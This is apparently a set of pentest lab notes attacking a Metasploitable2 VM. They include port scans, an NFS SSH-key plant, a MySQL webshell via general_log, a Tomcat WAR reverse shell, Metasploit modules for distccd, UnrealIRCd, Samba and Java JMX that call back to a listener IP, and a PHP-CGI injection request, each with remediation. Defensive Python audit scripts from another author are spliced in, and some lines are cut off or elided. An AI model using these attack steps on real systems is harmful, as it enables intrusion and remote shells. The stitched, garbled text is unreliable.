Metasploitable2 Notes
Author: p1ng
Tips:
The setg command sets parameters such as LHOST and LPORT as global variables instead of limiting them to the current module.
First, run an initial probing scan of the target machine to discover which ports it has open.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-19 09:35 CST
Nmap scan report for 172.16.1.140
Host is up (0.0035s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC 100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
33190/tcp open  status      1 (RPC 100005)
42383/tcp open  nlockmgr    1-4 (RPC

Kali> nmap -A -p- 172.16.1.140
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-19 15:25 CST
Nmap scan report for 172.16.1.140
Host is up (0.00076s latency).
Not shown: 65504 closed ports
PORT      STATE    SERVICE     VERSION
21/tcp    open     ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 172.16.1.123
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp    open     ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open     telnet      Linux telnetd
25/tcp    open     smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2023-03-19T05:37:47+00:00; -1h50m03s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
53/tcp    open     domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp    open     http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open     rpcbind     2 (RPC 100003)
2121/tcp  open     ftp         ProFTPD 1.3.1
3306/tcp  open     mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 9
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: bCg[rLf;2(s+yC39;:.t
3632/tcp  open     distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open     postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2023-03-19T05:37:47+00:00; -1h50m03s from scanner time.
5900/tcp  open     vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    VNC Authentication (2)
6000/tcp  open     X11         (access denied)
6200/tcp  filtered lm-x
6667/tcp  open     irc         UnrealIRCd
6697/tcp  open     irc         UnrealIRCd
8009/tcp  open     ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open     http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
8787/tcp  open     drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
51481/tcp open     nlockmgr    1-4 (RPC 100024)
53679/tcp open     mountd      1-3 (RPC

'`touch /tmp/test.txt`' /tmp &

25/tcp smtp
Check whether these users exist on the target machine:
Kali> smtp-user-enum -M VRFY -U <userlist> -t <target IP>
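As an added example (not from p1ng's notes), the following Python parses port lines in the nmap normal-output format shown above and reports every open service that is missing from an assumed allowlist for the host; the scan lines and the allowlist are constructed for the example.

```python
import re
from typing import Dict, List, Set, Tuple

# One port line of nmap's normal output, e.g. "21/tcp open ftp vsftpd 2.3.4".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Constructed sample in the same shape as the scan above (not the full scan).
SAMPLE_SCAN = """\
Nmap scan report for 172.16.1.140
PORT      STATE    SERVICE     VERSION
21/tcp    open     ftp         vsftpd 2.3.4
22/tcp    open     ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
3632/tcp  open     distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
6200/tcp  filtered lm-x
6667/tcp  open     irc         UnrealIRCd
"""

# Assumed allowlist for this host: only SSH is supposed to be reachable.
EXPECTED_PORTS: Set[int] = {22}


def parse_open_ports(text: str) -> Dict[int, Tuple[str, str]]:
    """Map port -> (service, version) for every line nmap reports as open.
    Script output ("|", "|_") and header lines do not match and are skipped."""
    found: Dict[int, Tuple[str, str]] = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            found[int(m.group(1))] = (m.group(4), (m.group(5) or "").strip())
    return found


def unexpected_exposures(found: Dict[int, Tuple[str, str]], expected: Set[int]) -> List[str]:
    """Open ports absent from the allowlist, one report line each."""
    return [f"{p}/tcp {svc} {ver}".rstrip()
            for p, (svc, ver) in sorted(found.items()) if p not in expected]


if __name__ == "__main__":
    for line in unexpected_exposures(parse_open_ports(SAMPLE_SCAN), EXPECTED_PORTS):
        print("unexpected:", line)
```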
111/tcp rpcbind && 2049/tcp nfs
Misconfigured NFS share (Mis-Configured NFS Share)
Method 1
Kali> showmount -e 172.16.1.140
Create a directory to hold the SSH key pair used for login:
Kali> cd /root/.ssh
/dev/null: redirects the output to the null device, i.e. writes nothing; known_hosts: the file that stores known host keys; so the purpose of this command is to clear the known_hosts file.
Kali> ssh-keygen -t rsa -b 4096
Name the generated key file test.
Kali> mount -t nfs 172.16.1.140:/ /mnt/
Copy the generated test.pub into the target server's SSH key directory, which is mounted under /mnt.
Kali> cat test.pub >> authorized_keys
Log into the target without a password using the generated SSH private key.
References:
https://computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson4/index.html
Remediation:
Restrict which directories are shared by specifying them in the /etc/exports file on the NFS server.
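As an added example (not from p1ng's notes), this Python audits /etc/exports lines for the properties the walkthrough above depends on: exporting the whole filesystem, exporting to any client, writable by any client, and no_root_squash. The weak and fixed export lines are constructed for the example.

```python
import re
from typing import List, Set, Tuple

# One client entry of an /etc/exports line: "<client>(<opt>,<opt>)" or a bare "<client>".
CLIENT_RE = re.compile(r"^(\S*?)\((.*)\)$")

# Constructed samples. The first is the kind of export the walkthrough above relies on
# (whole filesystem, any client, writable, root not squashed); the second is restricted.
WEAK_EXPORTS = "/ *(rw,sync,no_root_squash)\n"
FIXED_EXPORTS = "/srv/share 172.16.1.0/24(ro,sync,root_squash)\n"

def parse_clients(spec: str) -> List[Tuple[str, Set[str]]]:
    """Split the client part of an exports line into (client, options) pairs.
    A bare "(opts)" with no host, or no client list at all, means any host."""
    pairs = []
    for token in spec.split():
        m = CLIENT_RE.match(token)
        if m:
            opts = {o.strip() for o in m.group(2).split(",") if o.strip()}
            pairs.append((m.group(1) or "*", opts))
        else:
            pairs.append((token, set()))  # exportfs defaults: ro, root_squash
    return pairs or [("*", set())]

def audit_exports(text: str) -> List[str]:
    """Return one finding per risky property of each export line."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, clients = parts[0], (parts[1] if len(parts) > 1 else "")
        if path == "/":
            findings.append(f"{path}: whole root filesystem is exported")
        for client, opts in parse_clients(clients):
            anyone = client in ("*", "0.0.0.0/0")
            if anyone:
                findings.append(f"{path}: exported to any client ({client})")
            if anyone and "rw" in opts:
                findings.append(f"{path}: writable by any client")
            if "no_root_squash" in opts:
                findings.append(f"{path}: no_root_squash, a remote root can write files as root")
    return findings

if __name__ == "__main__":
    for f in audit_exports(WEAK_EXPORTS):
        print("finding:", f)
```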
139/tcp && 445/tcp samba
CVE-2007-2447 (Samba MS_RPC shell command injection vulnerability)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Method 1
Kali> msfconsole
Search for the Samba MS_RPC shell module.
msf6> use exploit/multi/samba/usermap_script
Set the target host's IP.
msf6> set LHOST <machine>

3306/tcp mysql
Connect to the mysql service remotely and log in as the superuser.
MySQL> select load_file('…');
MySQL> … '%secure%'
Check whether the secure_file_priv option has a value: if it is empty the operation can proceed; if it is not empty it has to be changed in the configuration file.
MySQL> select "…" into outfile "…";
MySQL> … '%general%'
Look at the specific general_log options.
MySQL> set global general_log='…';
MySQL> … '/var/www/html/test.php'
Point the log file into the web directory and give it a .php extension so the web server parses it.
MySQL> select "…";
The MySQL in Metasploitable2 does not have this option.
Remediation
Change the value of the secure_file_priv parameter to restrict the directory that into outfile / load_file may use; edit the configuration file my.cnf:
Kali> vim /etc/mysql/my.cnf
secure_file_priv='/tmp'
Restrict it to the /tmp directory.
Change the general_log parameter in my.cnf to general_log=0.
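As an added example (not from p1ng's notes), this Python reads the [mysqld] section of a my.cnf and reports the three settings the remediation above is about: an empty secure_file_priv, general_log switched on, and a general_log_file placed inside an assumed web root. Both config fragments are constructed for the example.

```python
import configparser
from typing import Dict, List

# Constructed my.cnf fragments: the weak one mirrors the settings abused above
# (unrestricted file access, general log written into the web root); the fixed one
# applies the remediation the notes describe.
WEAK_MY_CNF = """\
[mysqld]
secure_file_priv =
general_log = 1
general_log_file = /var/www/html/test.php
"""
FIXED_MY_CNF = """\
[mysqld]
secure_file_priv = /tmp
general_log = 0
"""
WEB_ROOTS = ("/var/www",)  # assumed document roots for this host

def mysqld_options(text: str) -> Dict[str, str]:
    """Read the [mysqld] section; dashes and underscores are interchangeable in my.cnf."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("mysqld"):
        return {}
    return {k.replace("-", "_"): (v or "").strip().strip("'\"") for k, v in cp.items("mysqld")}

def audit_mysqld(text: str) -> List[str]:
    """One finding per weak setting; an empty list means the fragment passes."""
    opts = mysqld_options(text)
    findings = []
    if not opts.get("secure_file_priv"):
        findings.append("secure_file_priv is empty or unset: load_file/into outfile can use any path the server can read or write")
    if opts.get("general_log", "0").upper() in ("1", "ON", "TRUE"):
        findings.append("general_log is enabled")
    logfile = opts.get("general_log_file", "")
    if logfile.startswith(WEB_ROOTS):
        findings.append(f"general_log_file {logfile} is inside a web root")
    return findings

if __name__ == "__main__":
    for f in audit_mysqld(WEAK_MY_CNF):
        print("finding:", f)
```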
5432/tcp postgresql
CVE-2007-3280
Method 1
Kali> msfconsole
msf6> use exploit/linux/postgres/postgres_payload
msf6> set RHOSTS 172.16.1.140
msf6> exploit
References
https://www.cvedetails.com/cve/CVE-2007-3280/
8180/tcp HTTP
Tomcat
Method 1
Kali> msfconsole
msf6> use auxiliary/scanner/http/tomcat_mgr_login
Brute-force the manager login; if it does not succeed, adjust the PASS_FILE and USERPASS_FILE parameters.
msf6> use exploit/multi/http/tomcat_mgr_deploy
Use msfvenom with java/jsp_shell_reverse_tcp as the payload, 172.16.1.123 as the listener IP and 8848 as the listener port to generate a WAR-format trojan.
msf6> use exploit/multi/handler
msf6> set payload java/jsp_shell_reverse_tcp
msf6> exploit
Kali> firefox
Click the Tomcat Manager option and enter the Tomcat username and password.
Once in the management backend, deploy the WAR package generated with msfvenom; the new path then appears in the application list. Click that path, and the listening handler module receives the reverse shell.
Remediation
Change the default Tomcat username and password; disable the Tomcat manager page or restrict access to it.
3632/tcp distccd
Principle: distccd is a distributed compiler used to speed up builds; its client and server communicate over a protocol with no authentication, which allows remote command execution.
msf6> use exploit/unix/misc/distcc_exec
msf6> set payload payload/cmd/unix/reverse
msf6> set RHOSTS 172.16.1.140
msf6> set LHOST 172.16.1.123
msf6> exploit
6667/tcp 6697/tcp UnrealIRCd
UnrealIRCd backdoor vulnerability
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload payload/cmd/unix/reverse
msf6> set RHOSTS 172.16.1.140
msf6> set LHOST 172.16.1.123
msf6> exploit
1099/tcp Java RMI
Exploit a vulnerability in the Java JMX service for remote code execution. Java JMX is Java's management and monitoring API; it lets developers instrument and manage Java applications.
msf6> use exploit/multi/misc/java_jmx_server
msf6> set payload payload/cmd/unix/reverse
msf6> set RHOSTS 172.16.1.140
msf6> set LHOST 172.16.1.123
msf6> exploit
Remediation:
Edit the Java JMX configuration files to disable remote access or define an access control policy, so that unauthorized access is prevented.
Locate the Java JMX configuration files jmxremote.access and jmxremote.password, usually under <JAVA_HOME>/jre/lib/management. If the two files are not in that directory, create them by hand. Edit jmxremote.access and add the following, which only allows local access:
monitorRole readonly
controlRole readwrite \
  create javax.management.monitor.*,javax.management.timer.* \
  unregister
Edit jmxremote.password and add the following, which only allows local access:
monitorRole monitorRolePassword
controlRole controlRolePassword
Show the source code
Here is a digression on PHP's command-line parameters:
-c  specify the location of the php.ini file
-n  do not load php.ini
-d  set a configuration directive
-b  start a FastCGI process
-s  display the file's source code
-T  execute the file the specified number of times
-h and -?  show help
With -d we can set auto_prepend_file to cause an arbitrary file inclusion vulnerability; allow_url_include must also be set to on to execute arbitrary code.
Payload: ?-d allow_url_include=on -d auto_prepend_file=php://input
URL-encode = and :, and replace spaces with +:
Payload: ?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
We construct the request:
POST /?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 172.16.1.140
Content-Length: 34
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Origin: http://172.16.1.140
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.1.140/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?php echo shell_exec('…'); ?>
Remediation:
Edit httpd.conf, find <Directory /> and add the following:
RewriteEngine on
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]
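As an added example (not from p1ng's notes), this Python re-implements the RewriteCond above and runs it over constructed request targets, so you can see which queries the rule rewrites (path kept, query dropped) and which it leaves alone before deploying it; the sample targets are constructed, the first being the payload shown above.

```python
import re
from typing import List
from urllib.parse import urlsplit

# The same test as the RewriteCond above: the raw (still URL-encoded) query string starts
# with "-" or "%2d" and contains no literal "=" afterwards, i.e. it looks like a list of
# php-cgi options rather than ordinary form parameters.
PHP_CGI_ARGS = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)

# Constructed request targets as they would appear in an access log; the first is the
# payload from the walkthrough above.
SAMPLES = [
    "/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input",
    "/index.php?-s",
    "/index.php?%2Ds",
    "/index.php?page=home",
    "/index.php?-d=x",  # a literal "=" makes the rule treat it as a normal parameter
    "/",
]

def is_cgi_argument_query(request_target: str) -> bool:
    """True when the RewriteCond would fire for this request target."""
    return bool(PHP_CGI_ARGS.match(urlsplit(request_target).query))

def apply_rewrite(request_target: str) -> str:
    """Mimic 'RewriteRule ^(.*) $1? [L]': keep the path, drop the query string."""
    if is_cgi_argument_query(request_target):
        return urlsplit(request_target).path
    return request_target

def flag_requests(targets: List[str]) -> List[str]:
    """Request targets from a log that the rule would have rewritten."""
    return [t for t in targets if is_cgi_argument_query(t)]

if __name__ == "__main__":
    for t in SAMPLES:
        print(f"{t!r:70} -> {apply_rewrite(t)!r}")
```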
References
https://www.cnblogs.com/virgree/p/5411582.html
https://blog.csdn.net/weixin_45605352/article/details/115283390
From https://sec-in.com/article/2160
